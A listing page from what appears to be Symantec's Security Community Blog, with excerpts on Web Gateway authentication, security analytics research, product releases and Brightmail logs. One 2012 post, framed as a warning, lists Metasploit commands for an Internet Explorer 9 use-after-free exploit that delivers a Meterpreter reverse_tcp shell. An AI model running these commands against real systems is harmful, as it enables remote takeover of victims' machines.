Video Screencast Help
Security Community Blog
Showing posts tagged with Messaging Gateway
Showing posts in English
OmerCh | 18 May 2013 | 0 comments

 

Background

Symantec Web Gateway is state of the art proxy and web filtering solution for corporate local area networks. It has the capability to authenticate end users and provide them secure web browsing experience as per organization’s policies and requirements.

SWG can use one of the 2 authentication mechanisms available in it named

-          Domain Controller Interface (DCI)

-          NTML Authentication

SWG can only use one of these methods at a time.

 

Comparison of NTLM authentication and DC Interface Mechanisms

NTLM and DC Interface provide different kinds of authentication mechanisms and have difference in functionality as well.

DC Interface

DCI works by integrating with domain controllers in an organization. In order to do so we need to install a small piece of software on domain...

Al Cooley - DeepSight Product Management | 29 Jan 2013 | 0 comments

There has been a data explosion within security teams, as organisations everywhere seek to increase their effectiveness in preventing breaches of defences through improved correlation and data sharing. You have probably seen this happening within your own working environment, too.

In the quest to achieve this sought-after level of ‘good enough’ security, the findings of new research from the Enterprise Strategy Group, ‘Big Data Intersection with Security Analytics’, partially sponsored by Symantec, are encouraging.

You won’t be too surprised to hear that, in our ‘Big Data’ world, we are collecting a lot more data than we used to two years ago. There is only one direction in which that arrow is going to be pointing from now on. What is interesting here, though, is that lots of people are vested in this information to do their job – and that is likely to envelop even more people, across a wide range of roles over the next...

Pamela Reese | 06 Dec 2012 | 0 comments

Symantec received a finalist nomination in 9 categories of the upcoming SC Magazine 2013 Awards, representing Symantec's broad portfolio of superior security offerings. SC Magazine will announce the winners at a dinner event during RSA 2013. Symantec looks forward to attending!

Pritesh J. Chauhan | 11 Oct 2012 | 0 comments

 

Over the last few weeks we have been working with a number of customers who have large administrative overheads when protecting their IT Infrastructure.

 

When selecting a new service they have either gone to tender or bought an off the shelf solution upon recommendation from colleagues/friends. 

 

Whilst this may seem great at first, over the years this has built up a number of systems each requiring their own management systems, portals, update systems and most importantly, they lack integration between solutions. Whilst this may seem like a large problem, it gets worse - the issue with these customers was that they had multiple products performing conflicting tasks. 

 

One example from a customer who had one product that is designed to AV scan contents of a USB pen drive upon connection to the machine. Another product to encrypt USB pen drives upon connection. This is great if the admin could...

Fabiano.Pessoa | 27 Sep 2012 | 0 comments

Hello
We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited as following command in Backtrack 5 R2

Metasploit:

- msfupdate
- Use exploit / windows / browser / ie_execcommand_uaf
- Set SRVHOST 192,168 ...
- Set PAYLOAD windows / Meterpreter / reverse_tcp
- Set LHOST 192,168 ...
- exploit

Let's beware the networking.

hugs

Amanda Grady | 26 Sep 2012 | 2 comments

 

In the June 2012 Symantec Security Intelligence Report, Symantec measured the volume of targeted attacks for the first half of 2012 and found that the average number of attacks per day had increased by 24 percent.

With the increase of targeted attacks in today’s threat landscape, the ability to quickly apply custom rules that are tailored to an individual customer is now critical. This is where Symantec Messaging Gateway 10 comes in.

Symantec is the only vendor to offer Customer Specific Rules in the new version of Symantec Messaging Gateway, which provide fast, customizable defense against malicious email attacks with new and automated technologies that give customers more control of their messaging security and simplified management.

What’s New?...

lukassc | 27 Mar 2012 | 4 comments

I need send severals emails to diferent recipients for a campain. The thing is that I don't whant to be blacklisted.
Do I need some configuration on SMG that help me with this?
Thx!

GrahamA | 11 Jan 2012 | 1 comment

Happy new year to you all!

The Symantec LUA team released version 2.3.1 in Dec. Just a quick status update for you in relation to how things have been going since then.

We've seen over 200 successful customer installs/upgrades of LUA 2.3.1 so far and feedback has been very positive.

As a recap, 2.3.1 introduced the following enhancements:

  • The LUA web server service will now automatically restart if it crashes or terminates unexpectedly.
  • LUA will now automatically install and utilise an optimised private Java Runtime Environment (version 1.6 update 27). This also means it is no longer necessary to separately install a public JRE for use by LUA.
  • It is now possible for LUA to automatically run multiple specified distribution tasks after a download task completes.
  • New quick link added to the user interface which allows customers to quickly and easily capture all LUA-related troubleshooting...
rscovel | 19 Dec 2011 | 4 comments

Symantec Protection Center 2.1 (SPC) has been released!

The Symantec Protection Center Team is proud to announce the release of Symantec Protection Center 2.1 (2.1.0.2075), which was published today to the LiveUpdate Publishing Service.  SPC 2.0 Customers will be notified that an update to SPC is available for download.  This is a LiveUpdate release only.  This update provides fixes for a small number of defects, as well as several major enhancements.

These enhancements include:

  • New Security Audit functionality, and reports
  • New Intrusion Detection System (IDS) signature reports
  • An enhanced Specific Endpoint report
  • SPC Web Interface security certificate management
  • Updated browser compatibility

Full details are found in the SPC 2.1 Release notes (DOC4967...

Art_P | 23 Nov 2011 | 0 comments

Brightmail Administration Event logs

Every so often I hear about a case where an administrator is looking for auditing of Control Center Quarantine administration or other configuration events. Generally, there is some surpise when they are told that the Control Center does have an audit log for such administrative events. Since log reviewing is a core part of security, I do recommend taking a look at the Brightmail Admin Events log and familiarizing yourself with the types of data it contains.

To access the Brightmail Admin Events log from the Control Center:
1. Click on Status.
2. Click on System | Logs in the left pane.
3. Change the Component to Control Center.
4. Change the Log type to Event Logs.
5. Set the Time Range to desired length.
6. Click on Display...